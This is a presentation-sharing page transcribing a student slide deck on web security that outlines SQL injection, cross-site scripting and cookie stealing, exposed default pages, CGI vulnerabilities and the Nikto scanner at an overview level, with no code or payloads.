1 / 21

Web Security

Web Security. Group 5 Adam Swett Brian Marco. Why Web Security?. Web sites and web applications constantly growing Complex business applications are now delivered over the web Increased “web hacking” activity Web Worms (Sammy) Firewalls?. Difficulties In Traditional Hacking.

rogan-richardson
Download Presentation

Web Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Web Security Group 5 Adam Swett Brian Marco

  2. Why Web Security? • Web sites and web applications constantly growing • Complex business applications are now delivered over the web • Increased “web hacking” activity • Web Worms (Sammy) • Firewalls?

  3. Difficulties In Traditional Hacking • Modern networks more secure • Firewalls being used in all network rollouts • OS vendors patching hole quickly • Increased maturity in coding

  4. Firewalls

  5. Lab Sections • SQL Injection • Basic • Blind • Cross Site Scripting (XSS) • Basics • Cookie Stealing • Java Scripting • Default Pages • CGI Vulnerabilities • Vulnerable Scripts • Nikto

  6. SQL Injection • Exploits a security vulnerability present in the database layer of an application • With Errors • Blind • Automated

  7. SQL Injection

  8. SQL Injection

  9. Cross Site Scripting • SecurityFocus cataloged over 1,400 issues. • WhiteHat Security has Identified over 1,500 in custom web applications. 8 in 10 websites have XSS. • Tops the Web Hacking Incident Database (WHID)

  10. Cross Site Scripting • Cookie Stealing • One of the most common uses of XSS • Allows you to impersonate someone • Can Lead To Session Hijacking • HTTP is stateless • Only verifies at the beginning of session

  11. Cross Site Scripting • Java Script • Can be written by anyone and executed on any computer over the web • Most people have Java Script enabled making it very dangerous

  12. Cross Site Scripting • Java Script Examples • black hat search engine optimization (SEO) • Click-fraud • Distributed Denial of Service • Force access of illegal content • Hack other websites (IDS sirens) • Distributed email spam (Outlook Web Access) • Distributed blog spam • Vote tampering • De-Anonymize people • etc.

  13. Cross Site Scripting

  14. Default Pages • Careless hosting • Gives the ability to browse and retreive a complete directory on the web server • Happens when the default page is missing • Not-so-strict Web server configuration

  15. Default Pages

  16. CGI Vulnerabilities • A number of widely distributed CGI scripts contain known security holes • Finding the scripts and exploiting them can be time consuming • Usually well documented on the web • Some can be worth it

  17. CGI Vulnerabilities • Nph-test-cgi • Script included with all old versions of Apache web Server • Allows user to view all files on the computer

  18. Nph-test-cgi

  19. Nikto • Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3300 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired)

  20. Nikto

  21. Sources • NetSquare Blackhat Asia Presentation • Whitehat Security • Spi Dynamics

More Related